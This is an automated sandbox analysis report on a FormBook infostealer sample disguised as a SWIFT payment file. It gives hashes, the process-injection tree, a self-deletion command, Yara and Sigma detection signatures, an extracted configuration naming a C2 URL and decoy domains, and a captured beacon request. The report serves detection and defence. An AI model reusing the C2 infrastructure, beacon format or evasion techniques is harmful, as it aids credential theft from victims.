Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SWIFT_MT103.exe

Overview

General Information

Sample Name:SWIFT_MT103.exe
Analysis ID:458843
MD5:b54e7fb4262c31a414b6dbcb49a5d800
SHA1:060dbdd923a63f4c782afe0d252bbc2e2585d255
SHA256:6c282c90bf6e72212f3c2038601a503d9e9e36bb417687fc8b16362fe854fa3d
Tags:exenull
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SWIFT_MT103.exe (PID: 720 cmdline: 'C:\Users\user\Desktop\SWIFT_MT103.exe' MD5: B54E7FB4262C31A414B6DBCB49A5D800)
    • RegSvcs.exe (PID: 6056 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 5040 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 4960 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bodymoisturizer.online/q4kr/"], "decoy": ["realmodapk.com", "hanoharuka.com", "shivalikspiritualproducts.com", "womenshealthclinincagra.com", "racketpark.com", "startuporig.com", "azkachinas.com", "klanblog.com", "linuxradio.tools", "siteoficial-liquida.com", "glsbuyer.com", "bestdeez.com", "teens2cash.com", "valleyviewconstruct.com", "myfortniteskins.com", "cambecare.com", "csec2011.com", "idookap.com", "warmwallsrecords.com", "smartmirror.one", "alertreels.com", "oiop.online", "61cratoslot.com", "hispanicassoclv.com", "pennyforyourprep.com", "fayansistanbul.com", "superbartendergigs.club", "herr-nourimann.com", "oatkc.net", "romahony.com", "sportcrea.com", "crystalnieblas.com", "lcmet.com", "nwaymyatthu-mm.com", "edsufferen.club", "apispotlight.com", "shadowcatrecording.com", "capwisefin.com", "themesinsider.com", "kadrisells.com", "db-82.com", "rentyoursubmarine.com", "rin-ronshop.com", "donzfamilia.com", "loyalcollegeofart.com", "socialize.site", "shadesailstructure.com", "smcenterbiz.com", "zcdonghua.com", "1420radiolider.com", "ckenpo.com", "trucksitasa.com", "getthistle.com", "usvisanicaragua.com", "josiemaxwrites.com", "dehaagennutraceuticals.com", "noiaapp.com", "blinbins.com", "getreitive.com", "turmericbar.com", "manifestwealthrightnow.com", "garagekuhn.com", "longviewfinancialadvisor.com", "hallworthcapital.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x81bb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x81f52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x147548:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x1478e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8dc65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1535f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x8d751:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x1530e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x8dd67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1536f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x8dedf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x15386f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x8296a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1482fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x8c9cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x15235c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x836e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x149072:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x92d57:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1586e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x93dfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        11.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        11.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        11.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5040
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5040
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5040
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe', CommandLine: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5040, ProcessCommandLine: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe', ProcessId: 4960

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bodymoisturizer.online/q4kr/"], "decoy": ["realmodapk.com", "hanoharuka.com", "shivalikspiritualproducts.com", "womenshealthclinincagra.com", "racketpark.com", "startuporig.com", "azkachinas.com", "klanblog.com", "linuxradio.tools", "siteoficial-liquida.com", "glsbuyer.com", "bestdeez.com", "teens2cash.com", "valleyviewconstruct.com", "myfortniteskins.com", "cambecare.com", "csec2011.com", "idookap.com", "warmwallsrecords.com", "smartmirror.one", "alertreels.com", "oiop.online", "61cratoslot.com", "hispanicassoclv.com", "pennyforyourprep.com", "fayansistanbul.com", "superbartendergigs.club", "herr-nourimann.com", "oatkc.net", "romahony.com", "sportcrea.com", "crystalnieblas.com", "lcmet.com", "nwaymyatthu-mm.com", "edsufferen.club", "apispotlight.com", "shadowcatrecording.com", "capwisefin.com", "themesinsider.com", "kadrisells.com", "db-82.com", "rentyoursubmarine.com", "rin-ronshop.com", "donzfamilia.com", "loyalcollegeofart.com", "socialize.site", "shadesailstructure.com", "smcenterbiz.com", "zcdonghua.com", "1420radiolider.com", "ckenpo.com", "trucksitasa.com", "getthistle.com", "usvisanicaragua.com", "josiemaxwrites.com", "dehaagennutraceuticals.com", "noiaapp.com", "blinbins.com", "getreitive.com", "turmericbar.com", "manifestwealthrightnow.com", "garagekuhn.com", "longviewfinancialadvisor.com", "hallworthcapital.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: SWIFT_MT103.exeMetadefender: Detection: 31%Perma Link
          Source: SWIFT_MT103.exeReversingLabs: Detection: 78%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: SWIFT_MT103.exeJoe Sandbox ML: detected
          Source: 11.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SWIFT_MT103.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: SWIFT_MT103.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.349194222.0000000006300000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: rundll32.exe, 00000015.00000002.470769360.0000000004907000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000B.00000002.358812103.000000000170F000.00000040.00000001.sdmp, rundll32.exe, 00000015.00000002.468350002.00000000044EF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 0000000B.00000002.359138151.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 0000000B.00000002.359138151.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: rundll32.exe, 00000015.00000002.470769360.0000000004907000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.349194222.0000000006300000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.bodymoisturizer.online/q4kr/
          Source: global trafficHTTP traffic detected: GET /q4kr/?h6=Vpi8s2sp00E&4h_4=CWCBar0ajh7IOPyGoiQ+OSxuK1fv7pOEcpev3lNBz5ExpQMJFIwPX0r3WtdZztc5D/uY HTTP/1.1Host: www.garagekuhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: GANDI-AS-2Domainnameregistrar-httpwwwgandinetFR GANDI-AS-2Domainnameregistrar-httpwwwgandinetFR
          Source: global trafficHTTP traffic detected: GET /q4kr/?h6=Vpi8s2sp00E&4h_4=CWCBar0ajh7IOPyGoiQ+OSxuK1fv7pOEcpev3lNBz5ExpQMJFIwPX0r3WtdZztc5D/uY HTTP/1.1Host: www.garagekuhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.garagekuhn.com
          Source: explorer.exe, 0000000E.00000000.324187386.00000000089EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: SWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SWIFT_MT103.exe, 00000000.00000003.209480927.000000000594D000.00000004.00000001.sdmp, SWIFT_MT103.exe, 00000000.00000003.209448002.000000000594D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comR.TTFr
          Source: SWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comV
          Source: SWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: SWIFT_MT103.exe, 00000000.00000003.209736302.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: SWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasv
          Source: SWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrita
          Source: SWIFT_MT103.exe, 00000000.00000003.209514147.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comi
          Source: SWIFT_MT103.exe, 00000000.00000003.209736302.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: SWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: SWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comt
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: SWIFT_MT103.exe, 00000000.00000003.204967901.0000000005914000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SWIFT_MT103.exe, 00000000.00000003.204932376.0000000005914000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SWIFT_MT103.exe, 00000000.00000003.204967901.0000000005914000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cno
          Source: SWIFT_MT103.exe, 00000000.00000003.210711299.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmp, SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
          Source: SWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
          Source: SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/D
          Source: SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/M
          Source: SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: SWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
          Source: SWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h
          Source: SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/i
          Source: SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmp, SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/D
          Source: SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/_
          Source: SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
          Source: SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o4
          Source: SWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vnoi
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
